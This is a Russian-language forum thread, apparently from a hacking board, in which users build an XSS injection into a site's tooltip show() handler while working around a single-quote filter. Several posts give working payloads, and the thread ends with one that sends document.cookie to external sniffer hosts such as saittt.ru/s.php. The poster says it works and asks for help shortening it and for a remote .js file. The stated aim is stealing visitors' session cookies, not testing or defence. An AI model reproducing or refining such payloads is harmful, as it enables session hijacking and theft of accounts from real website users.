Есть такая функция вывода текста: function show(text) { var s; s='<FONT STYLE="FONT-SIZE: 8pt;">'+text+'</FONT>'; hint1.innerHTML=s; SetPosition(); hint1.style.visibility='visible'; } Она выводит на экран текст таким образом onmouseover="show('ТЕКСТ');" Помогите пожалуйста, можно ли вставить в show('СЮДА') еще одну ява функцию (например: alert(document.cookie) если не розрешается использовать символ " ' " (одинарной кавычки), он заменяется на Также розрешается использовать любые символы вида " , & , < и т.к. P.S. Если допускалось использование одинарной кавчки, я бы сделал так onmouseover="show('ТЕКСТ');alert(document.cookie);('');", т.е. просто бы вставил ');alert(document.cookie);(' Но увы так нельзя... поэтому пришлось обращаться к вам за помощью
Уже нашел одно из решений, но всерано не могу добиться главного: Вот такое проходит: </script><img src=javascript:alert(document.cookie);><script> Но мне нужно чтобы кукисы не выводились а отправлялись на сниффер. Написал вот так вот: </script><img src=javascript:document.images[0].src=http://adress/sniff.php?+document.cookie;><script> Но выводит синтаскичискую ошибку... помогите розобраться, напомнаю использовать " ' " (одинарную кавычку) нельзя
src="http://adress/sniff.php?"+document.cookie;> так попробуй. Двойные ковычки то использывать можно?
Масса способов. Например </script><img src=javascript:document.images[0].src="http://adress/sniff.php?+document.cookie;"><script> А вообще см. http://antichat.ru/crackchat/HTML/ Там все есть.
думаю двойные кавчки здесь не выход.. т.к. елси поставить двойную кавычку, то она закроет onmouseover=" вот эту.. но этого делать нельзя(
</script><img src=javascript:document.images[0].src="http://saittt.ru/s.php?i="+document.cookie;><script> В итогде это все работает, но там стоит ограничение на кол-во символов.. так что если возможно.. то нужно сделать длинной не больше чем </script><img src=javascript:document.images[0].src="http://saittt.ru/s.php?i="+... вот посюда оно его обрезает.. последний штрих
Если можешь, напиши содержимое .js файла.. а то я плохо в яве розбираюсь, но то что ты предложил понял, и мне это видимо подходит...